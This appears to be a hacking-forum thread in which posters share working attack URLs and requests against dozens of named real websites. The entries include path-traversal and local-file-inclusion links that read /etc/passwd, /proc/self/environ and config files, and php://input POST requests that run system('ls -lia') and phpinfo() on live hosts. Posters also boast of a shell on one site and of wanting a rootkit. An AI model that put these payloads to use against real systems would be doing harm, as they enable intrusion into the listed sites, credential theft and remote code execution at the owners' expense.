Code: http://www.alushta.ua/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00
Code: http://polyakovprud.dp.ua/index.php?page=/../../../../../../../../../proc/self/environ Code: http://mir-audio.com.ua/admin/file_manager.php/login.php?action=download&filename=includes/configure.php for the last one: https://forum.antichat.ru/showthread.php?t=71111 you can add an admin and simply log in as them
php://input: arbitrary PHP code execution, I rarely see it. So, we send the following POST requests:
Code:
POST /index.php?link=php://input HTTP/1.1
Host: www.alternativeautosource.net
Content-Length: 19

<?php phpinfo(); ?>
Code:
POST /lang_de/main.php?view=php://input HTTP/1.1
Host: www.galvania.ca
Content-Length: 19

<?php phpinfo(); ?>
Code:
POST /page_en.php?link=php://input HTTP/1.1
Host: www.rochelle.cz
Content-Length: 19

<?php phpinfo(); ?>
and we see the servers' PHPINFO
Code:
POST /WWW/main.php?CONTENT=php://input HTTP/1.1
Host: polyplast-mainz.de
Content-Length: 27

<?php system("ls -lia"); ?>
and here is a directory listing))
HTML: http://www.sexycamnow.com/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 HTML: http://grindhouze.com/cms/index.php/recent/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 HTML: http://www.semiprice.fr/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
One of the largest education portals in Latvia: Code: http://shkola.lv/index.php?mode=goods&page=../../../../../etc/passwd%00
Code: http://www.hyaffiliates.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image Code: http://pheromore.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image Code: http://www.4xwins.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image Code: http://www.blastarticles.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image Code: http://www.attractingabundance.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image Code: http://www.parentcoachplan.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image
http://www.wirtualnailawa.pl/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
http://www.virtualiroma.it/index.php?open=/web/htdocs/www.virtualiroma.it/home/index.php http://www.giardinodiroma.eu/index.php?open=../../../../../../../etc/issue
http://www.smacworld.com/new/index.php?p=../../../../../../../../../../proc/self/environ For anyone interested, there is a shell there, but I can't install a rootkit, there are no exploits yet
http://wierzba.wzks.uj.edu.pl/~dymet/zarty/index.php?go=/etc/passwd%00 http://www.fav.co.il/index.php?dir=app_sites&page=../../../../../../../etc/hosts%00
http://www.equinix.com/download.php?file=../../../../../../../../../../../../../etc/passwd http://www.hrcpa.com/press/index.php?file=../../../../../../../../../../etc/passwd (--> source code)
http://www.e-ntech.com/index.php?page=../../../../../../../../../../etc/passwd http://www.hiro-seiko.com/index.php?page=../../../../../../../../../../etc/passwd http://www.mitorosso.com/index.php?p=../../../../../../../../../../etc/passwd http://www.maxparts.ru/index.php?page=../../../../../../../../../../etc/passwd http://athomebirmingham.com/index.php?p=../../../../../../../../../../etc/passwd http://www.myspacegraphicshelper.com/index.php?page=../../../../../../../../../../etc/passwd http://www.opticaldocumentsecurity.com/index.php?page=../../../../../../../../../../etc/passwd http://www.amarc.org/index.php?p=../../../../../../../../../../etc/passwd http://www.madrid21comunidad.fida.es/index.php?pagina=../../../../../../../../../../proc/self/environ good luck
PR - 1 Code: http://www.4kidsinpa.com/index.php?option=com_jesubmit&view=../../../../../../../../../etc/passwd%00 Code: http://www.andycon.net/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd PR - 2 Code: http://westcoastghosthunters.com/index.php?option=com_jesubmit&view=&view=../../../../../../../../../../../../../etc/passwd%00 Code: http://westcoastghosthunters.com/index.php?option=com_jesubmit&view=&view=../../../../../../../../../../../../../etc/passwd%00 PR - 4 Code: http://www.kommunisten.de/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 PR - 5 Code: http://www.armnn.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 Code: http://www.teabagfree.com/index.php/events/day.listevents/2009/11/19/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 PR - 3 Code: http://www.svkronenberg.nl/beugelen/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 PR - 1 Code: http://borchardtbrothers.com/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 Code: http://www.svkronenberg.nl/beugelen/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 Code: http://www.oranjportal.com/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 Code: http://www.aliveinchrist.org/index.php/templates/templates/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
http://www.rhianna.ro/index.php?page=../../../../../../../../../../proc/self/environ http://www.vapnet.com.br/index.php?pagina=../../../../../../../../../../proc/self/status http://www.mutokukai.ru/iframe.php?target=../../../../../../../../../../etc/passwd
http://www.wirtualnailawa.pl/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 http://www.popular-articles.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 http://www.kucha-statey.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 http://www.articles-top.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 http://www.articlesgallery.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 http://www.top-statey.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 http://monsterspray.biz/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00 http://www.asictonline.org/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00